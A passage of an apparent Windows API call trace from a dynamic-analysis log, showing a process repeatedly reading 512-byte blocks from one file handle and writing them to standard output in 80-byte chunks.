lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.787] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.787] GetFileType (hFile=0x50) returned 0x1 [0194.787] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.787] WriteFile (in: hFile=0x50, lpBuffer=0x2af1b4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af1b4*, lpNumberOfBytesWritten=0x2ae1b8*=0x20, lpOverlapped=0x0) returned 1 [0194.787] _get_osfhandle (_FileHandle=4) returned 0x58 [0194.787] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae1a4 | out: lpNewFilePointer=0x0) returned 1 [0194.787] _get_osfhandle (_FileHandle=4) returned 0x58 [0194.787] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0194.787] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.787] GetFileType (hFile=0x50) returned 0x1 [0194.788] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.788] GetFileType (hFile=0x50) returned 0x1 [0194.788] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.788] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.788] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.788] GetFileType (hFile=0x50) returned 0x1 [0194.788] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.788] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.788] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.788] GetFileType (hFile=0x50) returned 0x1 [0194.788] _get_osfhandle (_FileHandle=1) returned 0x50 
[0194.788] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.788] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.788] GetFileType (hFile=0x50) returned 0x1 [0194.788] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.788] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.788] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.788] GetFileType (hFile=0x50) returned 0x1 [0194.788] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.788] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.788] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.789] GetFileType (hFile=0x50) returned 0x1 [0194.789] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.789] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.789] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.789] GetFileType (hFile=0x50) returned 0x1 [0194.789] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.789] WriteFile (in: hFile=0x50, lpBuffer=0x2af1b4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af1b4*, lpNumberOfBytesWritten=0x2ae1b8*=0x20, lpOverlapped=0x0) returned 1 [0194.789] _get_osfhandle (_FileHandle=4) returned 0x58 [0194.789] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae1a4 | out: lpNewFilePointer=0x0) 
returned 1 [0194.789] _get_osfhandle (_FileHandle=4) returned 0x58 [0194.789] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0194.789] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.789] GetFileType (hFile=0x50) returned 0x1 [0194.789] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.789] GetFileType (hFile=0x50) returned 0x1 [0194.789] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.789] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.789] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.789] GetFileType (hFile=0x50) returned 0x1 [0194.789] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.789] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.789] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.789] GetFileType (hFile=0x50) returned 0x1 [0194.790] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.790] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.790] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.790] GetFileType (hFile=0x50) returned 0x1 [0194.790] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.790] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.790] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0194.790] GetFileType (hFile=0x50) returned 0x1 [0194.790] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.790] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.790] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.790] GetFileType (hFile=0x50) returned 0x1 [0194.790] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.790] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.790] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.790] GetFileType (hFile=0x50) returned 0x1 [0194.790] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.790] WriteFile (in: hFile=0x50, lpBuffer=0x2af1b4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af1b4*, lpNumberOfBytesWritten=0x2ae1b8*=0x20, lpOverlapped=0x0) returned 1 [0194.790] _get_osfhandle (_FileHandle=4) returned 0x58 [0194.790] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae1a4 | out: lpNewFilePointer=0x0) returned 1 [0194.790] _get_osfhandle (_FileHandle=4) returned 0x58 [0194.791] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0194.791] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.791] GetFileType (hFile=0x50) returned 0x1 [0194.791] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.791] GetFileType (hFile=0x50) returned 0x1 [0194.791] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.791] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.791] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.791] GetFileType (hFile=0x50) returned 0x1 [0194.791] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.791] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.791] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.791] GetFileType (hFile=0x50) returned 0x1 [0194.791] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.791] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.792] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.792] GetFileType (hFile=0x50) returned 0x1 [0194.792] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.792] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.792] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.792] GetFileType (hFile=0x50) returned 0x1 [0194.792] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.792] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.792] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.792] GetFileType (hFile=0x50) returned 0x1 [0194.792] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.792] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, 
lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.792] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.792] GetFileType (hFile=0x50) returned 0x1 [0194.792] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.792] WriteFile (in: hFile=0x50, lpBuffer=0x2af1b4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af1b4*, lpNumberOfBytesWritten=0x2ae1b8*=0x20, lpOverlapped=0x0) returned 1 [0194.792] _get_osfhandle (_FileHandle=4) returned 0x58 [0194.792] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae1a4 | out: lpNewFilePointer=0x0) returned 1 [0194.792] _get_osfhandle (_FileHandle=4) returned 0x58 [0194.792] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0194.792] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.793] GetFileType (hFile=0x50) returned 0x1 [0194.793] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.793] GetFileType (hFile=0x50) returned 0x1 [0194.795] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.795] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.795] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.795] GetFileType (hFile=0x50) returned 0x1 [0194.795] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.795] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.795] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.795] GetFileType (hFile=0x50) returned 0x1 [0194.795] 
_get_osfhandle (_FileHandle=1) returned 0x50 [0194.795] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.795] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.795] GetFileType (hFile=0x50) returned 0x1 [0194.795] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.795] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.795] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.795] GetFileType (hFile=0x50) returned 0x1 [0194.795] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.795] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.795] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.795] GetFileType (hFile=0x50) returned 0x1 [0194.796] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.796] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.796] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.796] GetFileType (hFile=0x50) returned 0x1 [0194.796] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.796] WriteFile (in: hFile=0x50, lpBuffer=0x2af1b4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af1b4*, lpNumberOfBytesWritten=0x2ae1b8*=0x20, lpOverlapped=0x0) returned 1 [0194.796] _get_osfhandle (_FileHandle=4) returned 0x58 [0194.796] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, 
dwMoveMethod=0x2ae1a4 | out: lpNewFilePointer=0x0) returned 1 [0194.796] _get_osfhandle (_FileHandle=4) returned 0x58 [0194.796] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0194.796] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.796] GetFileType (hFile=0x50) returned 0x1 [0194.796] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.796] GetFileType (hFile=0x50) returned 0x1 [0194.796] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.796] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.796] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.796] GetFileType (hFile=0x50) returned 0x1 [0194.796] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.796] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.796] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.796] GetFileType (hFile=0x50) returned 0x1 [0194.797] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.797] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.797] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.797] GetFileType (hFile=0x50) returned 0x1 [0194.797] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.797] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, 
lpOverlapped=0x0) returned 1 [0194.797] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.797] GetFileType (hFile=0x50) returned 0x1 [0194.797] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.797] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.797] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.797] GetFileType (hFile=0x50) returned 0x1 [0194.797] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.797] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.797] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.797] GetFileType (hFile=0x50) returned 0x1 [0194.797] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.797] WriteFile (in: hFile=0x50, lpBuffer=0x2af1b4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af1b4*, lpNumberOfBytesWritten=0x2ae1b8*=0x20, lpOverlapped=0x0) returned 1 [0194.797] _get_osfhandle (_FileHandle=4) returned 0x58 [0194.797] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae1a4 | out: lpNewFilePointer=0x0) returned 1 [0194.798] _get_osfhandle (_FileHandle=4) returned 0x58 [0194.798] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0194.798] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.798] GetFileType (hFile=0x50) returned 0x1 [0194.798] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.798] GetFileType (hFile=0x50) returned 0x1 [0194.798] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.798] WriteFile (in: hFile=0x50, 
lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.798] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.798] GetFileType (hFile=0x50) returned 0x1 [0194.798] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.798] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.798] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.798] GetFileType (hFile=0x50) returned 0x1 [0194.798] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.798] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.798] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.798] GetFileType (hFile=0x50) returned 0x1 [0194.798] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.798] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.798] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.798] GetFileType (hFile=0x50) returned 0x1 [0194.799] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.799] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.799] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.799] GetFileType (hFile=0x50) returned 0x1 [0194.799] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.799] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, 
nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.799] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.799] GetFileType (hFile=0x50) returned 0x1 [0194.799] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.799] WriteFile (in: hFile=0x50, lpBuffer=0x2af1b4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af1b4*, lpNumberOfBytesWritten=0x2ae1b8*=0x20, lpOverlapped=0x0) returned 1 [0194.799] _get_osfhandle (_FileHandle=4) returned 0x58 [0194.799] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae1a4 | out: lpNewFilePointer=0x0) returned 1 [0194.799] _get_osfhandle (_FileHandle=4) returned 0x58 [0194.799] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0194.799] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.799] GetFileType (hFile=0x50) returned 0x1 [0194.799] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.799] GetFileType (hFile=0x50) returned 0x1 [0194.799] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.799] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.799] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.800] GetFileType (hFile=0x50) returned 0x1 [0194.800] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.800] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.800] _get_osfhandle (_FileHandle=1) returned 0x50 
[0194.800] GetFileType (hFile=0x50) returned 0x1 [0194.800] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.800] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.800] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.800] GetFileType (hFile=0x50) returned 0x1 [0194.800] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.800] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.800] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.800] GetFileType (hFile=0x50) returned 0x1 [0194.800] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.800] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.800] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.800] GetFileType (hFile=0x50) returned 0x1 [0194.800] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.800] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.800] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.800] GetFileType (hFile=0x50) returned 0x1 [0194.801] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.801] WriteFile (in: hFile=0x50, lpBuffer=0x2af1b4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af1b4*, lpNumberOfBytesWritten=0x2ae1b8*=0x20, lpOverlapped=0x0) returned 1 [0194.801] _get_osfhandle (_FileHandle=4) returned 0x58 [0194.801] SetFilePointerEx (in: 
